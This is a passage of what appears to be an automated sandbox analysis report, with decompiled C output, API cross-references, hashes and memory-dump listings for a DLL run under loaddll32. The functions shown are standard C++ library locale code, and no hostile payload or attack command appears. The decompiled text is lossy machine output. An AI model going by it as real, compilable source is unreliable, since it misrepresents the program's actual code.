																																E6E2066BA(_t462 - 0x14);
																																return E6E220075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E21162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1E1438(_t397);
																																		E6E223D74(_t462 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e26851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e26c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E21542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E220075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E206FD3(__eflags, _t439);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e2c6dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E206FD3(__eflags, _t438);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e2c6e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E206FD3(__eflags, _t437);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e2c6dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E206FD3(__eflags, _t436);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e2c6dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E206FD3(__eflags, _t435);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e2c6de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E206FD3(__eflags, _t434);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e2c6ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E206FD3(__eflags, _t433);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e2c6db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E206FD3(__eflags, _t432);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e2c6dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E206FD3(__eflags, _t431);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e2c6dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E206FD3(__eflags, _t430);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e2c6dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

0x6e20f6b3
0x6e20f6b3
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e4
0x6e20f6e9
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1

APIs

__EH_prolog3.LIBCMT ref: 6E20F6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F6C4
int.LIBCPMT ref: 6E20F6DB

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F6FE
std::_Facet_Register.LIBCPMT ref: 6E20F715
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F735
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F753

Strings

|m,n, xrefs: 6E20F6CF

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |m,n
API String ID: 113178234-3550068666
Opcode ID: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
Instruction ID: fd568e27bc1ff9b3a391e1cd033205c842be542f981569738765c01386a0c0e3
Opcode Fuzzy Hash: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
Instruction Fuzzy Hash: F311CA7595051D9FCF01DBD4C894AEEB77BBF44714F240908E4106B2D0DB749A85C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t418 - 0x14, 0);
				_t399 =  *0x6e2c6dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1E161C(0x6e2c6d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E2066BA(_t418 - 0x14);
					return E6E220075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E2112B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t418 - 0x20);
							E6E223D74(_t418 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t389, _t399, 0x14);
							E6E206653(_t418 - 0x14, 0);
							_t400 =  *0x6e2c6dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1E161C(0x6e2c6d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E2066BA(_t418 - 0x14);
								return E6E220075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E211339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t418 - 0x20);
										E6E223D74(_t418 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t296, _t390, _t400, 0x14);
										E6E206653(_t418 - 0x14, 0);
										_t401 =  *0x6e2c6db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1E161C(0x6e2c6d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E2066BA(_t418 - 0x14);
											return E6E220075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E2113A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t418 - 0x20);
													E6E223D74(_t418 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t296, _t391, _t401, 0x14);
													E6E206653(_t418 - 0x14, 0);
													_t402 =  *0x6e2c6ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1E161C(0x6e2c6d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E2066BA(_t418 - 0x14);
														return E6E220075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E211409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t418 - 0x20);
																E6E223D74(_t418 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t296, _t392, _t402, 0x14);
																E6E206653(_t418 - 0x14, 0);
																_t403 =  *0x6e2c6de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1E161C(0x6e2c6d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E2066BA(_t418 - 0x14);
																	return E6E220075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E211471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t418 - 0x20);
																			E6E223D74(_t418 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t296, _t393, _t403, 0x14);
																			E6E206653(_t418 - 0x14, 0);
																			_t404 =  *0x6e2c6dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1E161C(0x6e2c6da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E2066BA(_t418 - 0x14);
																				return E6E220075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E2114EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t418 - 0x20);
																						E6E223D74(_t418 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t296, _t394, _t404, 0x14);
																						E6E206653(_t418 - 0x14, 0);
																						_t405 =  *0x6e2c6dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1E161C(0x6e2c6d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E2066BA(_t418 - 0x14);
																							return E6E220075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E211558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t418 - 0x20);
																									E6E223D74(_t418 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t296, _t395, _t405, 0x14);
																									E6E206653(_t418 - 0x14, 0);
																									_t406 =  *0x6e2c6e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1E161C(0x6e2c6dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E2066BA(_t418 - 0x14);
																										return E6E220075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E2115C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t418 - 0x20);
																												E6E223D74(_t418 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t296, _t396, _t406, 0x14);
																												E6E206653(_t418 - 0x14, 0);
																												_t407 =  *0x6e2c6dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1E161C(0x6e2c6d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E2066BA(_t418 - 0x14);
																													return E6E220075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E21162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1E1438(_t359);
																															E6E223D74(_t418 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e26851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e26c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E21542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E220075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E206FD3(__eflags, _t397);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e2c6dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E206FD3(__eflags, _t396);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e2c6e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E206FD3(__eflags, _t395);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e2c6dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E206FD3(__eflags, _t394);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e2c6dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E206FD3(__eflags, _t393);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e2c6de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E206FD3(__eflags, _t392);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e2c6ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E206FD3(__eflags, _t391);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e2c6db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E206FD3(__eflags, _t390);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e2c6dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E206FD3(__eflags, _t389);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e2c6dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

0x6e20f759
0x6e20f759
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78a
0x6e20f78f
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
